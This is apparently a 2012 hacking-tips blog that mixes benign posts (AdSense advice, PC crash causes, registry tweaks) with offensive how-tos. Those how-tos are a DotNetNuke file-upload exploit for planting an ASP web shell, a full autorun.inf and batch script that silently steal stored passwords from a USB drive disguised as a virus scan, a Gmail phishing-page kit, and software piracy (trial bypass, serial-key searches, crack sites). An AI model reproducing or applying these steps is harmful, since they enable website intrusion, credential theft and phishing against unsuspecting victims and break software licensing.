Friday, August 31, 2012

Hack Software and Run the Trial Program Forever

In this post I’ll show you how to hack a Software and run the trial program forever. Most of us are familiar with many softwares that run only for a specified period of time in the trial mode. Once the trial period is expired these softwares stop functioning and demand for a purchase. But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?

Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares. I’ll try to explain this in brief.


When these softwares are installed for the first time, they make an entry into the windows registrywith the details such as Installed Date and Time, installed path etc. After installation every time you run the software, it compares the current system date and time with the installed date and time. So, with this it can make out whether the trial period is expired or not.

So with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small Tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.

RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003 and Vista.

NOTE: FOLLOW THESE TIPS CAREFULLY
You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.

1. Note down the date and time, when you install the software for the first time.

2. Once the trial period expires, you must always run the software using RunAsDate.

3. After the trial period is expired, do not run the software(program) directly. If you run the software directly even once, this hack may no longer work.

4. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate. I hope this helps!

Iframe - Malicious Code Execution By Chintan_FrOgy_Gurjar


Description:
As we all know that the iFrame and Script are the HTML tags. But Now a days hackers are using iFrame and its internal attributes like Height Width and Frameborder more. Typically iFrame allows a developer to embed the content of one page to the another page. Calling one page's content to other page and showing there. Means A developer can call multiple page's content to show all in one page.

But the cyber criminals has found the exploit this functionality in order to run their malicious code to the client side.Hackers are using more iFrames as well as the Script command to execute javascripts as well as other malicious scripts to the client side through their websites. This type of attack is also called as Drive-By Attack. This type of attack is allowing hackers to run their code invisibly as well as silently.

Know More about iFrame for HTML5 -
http://www.w3schools.com/html5/tag_iframe.asp

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source: http://www.youtube.com/watch?v=kFr7u9sl0xY

Thursday, August 30, 2012

Case Study: Johnnie Walker South Africa email campaigns


Case Study: Johnnie Walker South Africa email campaigns

Johnnie Walker South Africa was looking to increase a specific segment of consumers on its email database. The proposed target group was mainly comprised of South African black male consumers, 18 – 30 years of age with disposable income. The use of viral email campaign/ refer a friend style tactic was chosen as the necessary medium. Although an email campaign is a well used tactic within viral marketing, agency teams and client felt confident due to the beginner to intermediate user level of the list. Connectivity is an issue in South Africa and most on the database would not have been heavily exposed to these types of campaigns.

The creative approach was primarily to appeal to the target market’s connectivity by finding something which would fit into their social value system. Research of the group told us that they were highly social but also aspired towards older, affluent males of the same culture who had made a success of their lives in the new South Africa. This older affluent group was also regarded as Johnnie Walker Black drinkers.

For full article visit @ http://www.seo-smm-smo.com/

Monday, August 27, 2012

A to Z Adsense Tips and Tricks

A to Z Adsense Tips and Tricks

Many websites out there are informative and attractive, but the only (and ofcourse the biggest) concern for webmasters is “how to make money with my website”. There are many publisher programs, but the following piece of text will focus on making money with Google Adsense program.

Steps to Increase Google CTR which means more money:

[a]. Strictly adhere to the google Polices and TOS. If you are not aware, here it is
https://www.google.com/adsense/policies?hl=en_US
[b]. Do not alter the Google Adsense code
[c]. Do not ask your friends or visitors to click on your Google ads. Do not offer incentives for users to click on google ads. Don’t label the Google ads with text other than “Sponsored Links” or “Advertisements
[d]. Do not click on your own ads. Google can find it out easily and if it does, your account will be banned and all your money earned is gone. Do not reload your pages excessively. If you are testing your website layout with Google Adsense, you can try the google adsense preview tool. Google does not account any clicks made in the ads displayed in the preview tool.
[e]. Do not place google ads in pop-up windows, error pages or even empty pages.
[f]. Don’t start a website merely for making money from accidental clicks like “mesothelioma attorney” or “asbestos crisis”. You will never make money out these “made-for-adsense-only” websites. Instead, write on topics what you are passionate about. Don’t waste your money on high-paying adsense keywords lists.
[g]. For short content/articles, CTR(click through rate) is best when ads are placed just above the content
[h]. For long articles, CTR improves if ads are placed somewhere in middle of the content, as visitors read the long content and then they are looking for more resources.
[i]. Use Text Ads instead of Image Ads as users get more options. If you still want to display image ads, consider ad formats that support image ads. Statistics say that the 336×280, 300×250 medium rectangle or the 160×600 wide skyscraper works excellent, if you display multiple ad units on a page.
[j]. Reports tell that the following ad format/attributes works best,
border color = background color of your web site
background color = background color of your web site
link color = blue, color of your links
url color = black, #999999
text color = black, #333333, color of your main content

[k]. Always put ads above the main fold. Just have the following heatmap as a reference before placing your ads on your pages.
http://www.vaughns-1-pagers.com/internet/google-heatmap-2.htm
[l]. Placing images next to ads or above ads does help in attracting user attention, But google does not recommend.
[m]. Blend AdLinks with other navigation links or place horizontal adlinks at the top of your webpage. AdSense publishers are permitted to click on link unit topics on their web pages, provided that they do not click on any Google ads on the resulting page.
[n]. Request your friends or colleagues to navigate your website, watch their activity, it will provide vital clues about which regions on your website draw more user attention. Try putting ads near those areas.
[o]. You can put upto 3 adsense units on a page. Try putting a large skyscraper on the right navigation sidebar of your website. That area is close to the browser scrollbar. You can also add 2 AdSense for search boxes, 1 adlink unit and 1 referral button per product (i.e., 1 AdSense referral button and 1 Firefox plus Google Toolbar referral button).
[p]. The first few lines of your content are an important factor for determining what Ads are served on your webpage. That’s the right place to put keywords in bold (strong or <b> tags) or header tags (h1, h2, etc).
[q]. Always select the setting to open Google Adsense search box results in a new browser window, so you won’t lose your visitors. Click the Open search results in a new browser window checkbox and this add target=”google_window” to your form tag.
[r]. Maximum people think the search box is on the top right corner. So you know where to put it.
[s]. Don’t syndicate full content in your RSS. If people can read everything from the newsreader window itself, why would they visit your website where your ads are.
[t]. Use URL channels to determine performance of individual pages. I track my most popular pages with Google Analytics, Statcounter and create a channel for each of the URL. You can even track Adsense Clicks with Analytics
[u]. For low CTR pages, try changing titles or adding more content to get better focused ads
[v]. Block low paying advertisers with Filters. Why to loose a visitor for 0.01 cents. Use Overture or Google Adwords Keywords tool to discover keywords that are less popular with advertisers.
[w]. The AdSense for search Top Queries report shows you what your users are looking for, by listing the 25 most common searches conducted through your AdSense for search boxes. Use this report to identify additional topics to add to your site, or to keep track of your most sought-after information. Focus and improve that content.
[x]. Not everyone has an RSS reader. Use RSS to Email services like FeedBlitz, Bloglet or Rmail to let users subscribe to your blog by email.
[y]. Try experimenting until you get highest CTR. Placement of ads depends from site to site. What is good for Yahoo is not best for google. So, try try until you find a good CTR
[z]. Use a Tracking website like Google Analytics or Sitemeter to track your visitors and see what keywords they have been searching and use it to your advantage :)
Happy Money Making Guys :D

Tuesday, August 14, 2012

DNN HACKS

Here i am going to point out how to exploit a vuln in dnn ie dotnenuke site to gain access to a site

1) find a dotnetNuke site
2) google dork :- inurl:default.aspx

3) suppose u find the site http://siteName/default.aspx
4) go to the location http:siteName/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
5) if its vul a link gallery page will be open  as shown

DNN-hack

6)if you now paste the following javascript code into the address bar and hit enter: “javascript:__doPostBack('ctlURL$cmdUpload','')” a upload box will come into the section as shown

DNN-hack

7)Now u can upload the img or any fileon the path which u can specify from drop down  to upload a asp shell u have to rename a asp file with semi colon after asp as shown beloaw

eg : shell.asp;.jpg

9) since iis will not recognize extension after semi colon it will execute the shell as asp

Sunday, August 12, 2012

How to sniff Passwords using USB Drive

How to sniff Passwords using USB Drive

Anyone can steal stored passwords from any computer  and that tool by using your USB drive.

Can’t believe!

Read on..

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to  from any computer. We need the following tools to create our rootkit.
MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassViewRecovers the passwords of the following email programs: Outlook Express,  Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE PassviewIE PassView is a small utility that reveals the passwords stored by internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of password-protected sites, MSN Explorer Passwords, and more…

PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password -hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. download  all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe and passwordfox.exe into your USB Drive.

2. Create a new notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer

GMAIL PHISHING:)

Phishing is the process of stealing sensitive information (silently), such as usernames, passwords, and bank information, by pretending to be someone you’re not. I have already explained it in detail in phishing.

Files we will be creating:
1. phishing.php
2. index.html
3. password.txt


You can save your time by simply downloading all the 3 file which I have already created.

https://www.box.com/shared/uoo8vd9v1ypdo9t05qbx

Final step

Upload all the 3 files in file manager of your web hosting. If you don't have your own web hosting at present, search for a free web hosing site which gives PHP access. I prefer . (http://www.000webhost.com/)

Sign up for a on this site. Go to file manager and Upload all the 3 files(UPLOAD IN PUBLIC_HTML FOLDER & DELETE DEFAULT FOLDER) and save it.

Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.

Now whoever will try to login for Gmail through your Fake page, his/her Username and Password will be automatically saved in Password.txt  file as plain text which you can view easily. Also the victim won't have a hint that he/she has been hacked since, he/she will be redirected to the original Gmail page and will get a feel as if he/she entered a wrong password by mistake.

Saturday, August 11, 2012

Get the serial number you need

Get the serial number you need ! (For Certain Things)

* Go to Google.

* In the search field type: "Product name" 94FBR

* Where, "Product Name" is the name of the item you want to find the serial number for.

* And voila - there you go - the serial number you needed.

HOW DOES THIS WORK?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things. 1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for. 2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

See these example searches:

"Photoshop 7" 94FBR

"Age of Mythology" 94FBR

"Nero Burning Rom 5.5" 94FBR

&  if u cannot find from here, u can  visit this site http://www.findserialnumber.me

Get Serial keys from Serials Search Engines
Here i also want to present you a list of "clean" crack/Serial Search sites for all the latest warez to unlock your software.Please note that the site reviews herein only include information about each site, not the contents of the 'cracks' themselves. Always use a reputable antivirus and antispyware program on cracks & keygens before using them. The same goes for Craagle

 * www.serials.ws
* www.keygen.in
* www.smartserials.com
* www.keygenguru.com - Popular site with hundreds of thousands of results.
* www.serialkey.net
* www.zcrack.com
* www.subserials.net
* www.serialportal.com
* supercracks.net
* www.serialcrackz.com
* www.serials.be
* www.cracktop.com
* www.cracksfm.com
* www.cracklib.net
* www.crackdb.org
* www.theserials.com

DOWNLOAD CRACK VERSION OF INTERNET DOWNLOAD MANAGER.

CLICK ON BELOW LINK & DOWNLOAD ZIP FILE.
UNZIP IT & CLICK ON SILENT INSTALLATION.
http://www.4shared.com/rar/NxgRwXH8/idm.html

HOW TO UNLOCK FOLDER WHICH IS LOCKED BY SOME SOFTWARE???


FOR THIS PURPOSE YOU ONLY NEED IS WINZIP OR ANY OTHER COMPRESSION SOFTWARE.

(1) Folder which are lock, sometimes it is hidden by that software. So first you check the option of show hide files  option in folder option of organise.
(2)Now you can see lock file..when u try to open it..it will not open. now right click on folder and add to   "folder name”.rar. I mean if ur folder name is lock,  then  right  click on lock and click to add “ lock”.rar
(3)now all thing is done. Open ur compressed folder, it will open. If it will not open. Then go on subfolder & do it again.

If this thing is not work, then i am sorry. Keep google it.

Windows - Speed Up Your Network and Internet Access

Windows: Speed Up Your, Speed Up Your Network and Internet Access

I have a dial up connection and it improve my speeds about 25% in surfing the internet. give it a try. Im IT , only do it if you feel comfortable with changing registry.

Increasing network browsing speed

Does your computer slow down when you browse your local area network and connect to other computers that are sharing data? One of the most common causes of this slowdown is a feature of Windows Explorer that looks for scheduled tasks on remote computers. This effort can take some time on some computers and can really slow down your browsing. The window with which you are browsing the network may appear to freeze momentarily, as the system is waiting for a response from the remote computer.


Windows XP: Speeding Disk Access

Although this problem is a complex one, the solution is very simple. Instead of having to wait for the remote scheduled tasks, which is useless information to anyone who is not a system administrator remotely configuring scheduled tasks, you can disable this feature.

In order to do this, you will have to change the System Registry and delete a reference to a key so that this feature will not be loaded. To do this, follow these steps:

1. Open up the Registry Editor by clicking the Start Menu and selecting Run. Then type regedit in the text box and click the OK button.

2. Once the Registry Editor has loaded, expand the HKEY_LOCAL_MACHINE key.

3. Next, expand Software and then Microsoft.

4. Locate Windows and expand that as well.

5. You will want to be editing the main system files, so expand CurrentVersion.

6. Because this feature is a feature of the Windows component known as Explorer, expand the Explorer key.

7. Next, you will want to modify the remote computer settings, so expand the RemoteComputer key and then expand the NameSpace key to show all of the features that are enabled when you browse to a remote computer.

8. In the NameSpace folder you will find two entries. One is "{2227A280-3AEA-1069-A2DE-08002B30309D}" which tells Explorer to show printers shared on the remote machine. The other, "{D6277990-4C6A-11CF-8D87-00AA0060F5BF}," tells Explorer to show remote scheduled tasks. This is the one that you should delete. This can be done by right-clicking the name of the key and selecting Delete.

Tip:
If you have no use for viewing remote shared printers and are really only interested in shared files, consider deleting the printers key, "{2227A280-3AEA-1069-A2DE-08002B30309D}", as well. This will also boost your browsing speed.

Once you have deleted the key, you just need to restart and the changes will be in effect. Now your network computer browsing will be without needless delays.

10 reasons why PCs crash U must Know

10 reasons why PCs crash U must Know

Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."

You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?


1 Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

* Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

2 Bad Ram

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3 BIOS settings

Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

4 Hard disk drives

After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

* Start-Programs-Accessories-System Tools-Disk Defragmenter

This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.

The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).

Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to

* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.

Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

* Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

5 Fatal OE exceptions and VXD errors

Fatal OE exception errors and VXD errors are often caused by video card problems.

These can often be resolved easily by reducing the resolution of the video display. Go to

* Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.

If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

* Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.

If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.

The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.

Another useful way to resolve video problems is to go to

* Start-Settings-Control Panel-System-Performance-Graphics

Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).

Look up your video card's manufacturer on the internet and search for the most recent drivers for it.

6 Viruses

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to

* Start-Settings-Control Panel-Add/Remove Programs

Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.

A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.

An excellent antivirus programme is McAfee VirusScan by Network Associates ( www.nai.com). Another is Norton AntiVirus 2000, made by Symantec ( www.symantec.com).

7 Printers

The action of sending a document to print creates a bigger file, often called a postscript file.

Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.

If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.

8 Software

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.

The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.

Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from www.jv16.org

Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.

Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.

Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.

Remember to restore all the BIOS settings back to their former settings following installation.

9 Overheating

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.

One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com

CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

10 Power supply problems

With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.

If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.

It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.

how to download from mediafire site?

All Mediafire.com Downloads:

http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.*+site%3Amediafire.com

Apps Downloads on Mediafire.com:

http://www.google.com/search?hl=en&lr=&as_qdr=all&q=.cab+OR+.exe+OR+.rar+OR+.zip+site%3Amediafire.com&btnG=Search
Movies Download on Mediafire.com

http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.Avi+OR+.mpg+OR+.mpeg+site%3Amediafire.com&btnG=Search

1)www. mediafiresearch.net Like any other MediaFire search website this site has options to search files on MediaFire, Rapidhsare.com, Hotfile.com, Filesonic.com and many other popular file uploading sites. Also it has got the last 100 searches made on the website in the form of links, you might like some of them.

2)www.shufs.com This is a very decent search engine for MediaFire with options to search files on Megaupload, Rapidshare, Bodango, and Zshare as well.

3)www.uvrx.com/mediafire.html UVRX uses Google custom search engine in order to find files from MediaFire. Type the keywords and it will fetch you the best possible results using the Google Search algorithm.

4)www.searchshared.com/mediafire.com This MediaFire Search engine site has been shared over 1783 Facebook fans and by the looks of it seems quite popular.

5)www. jqd.org  JQD supports Rapidshare, Megaupload, MediaFire, SendSpace, Gigasize, ADrive, Zshare, Depositfiles, Netload, Bodango, Megashares, FileFactory and you can also use it to search for Torrents online. If you want to try a cool file uploading site then check out 4Shared.com, we are sure you will love it. Anyways do let us know if you frequently use Mediafire.com search for all your downloading needs. Also share it with your buddies so that they can make use of all these Mediafire Search websites!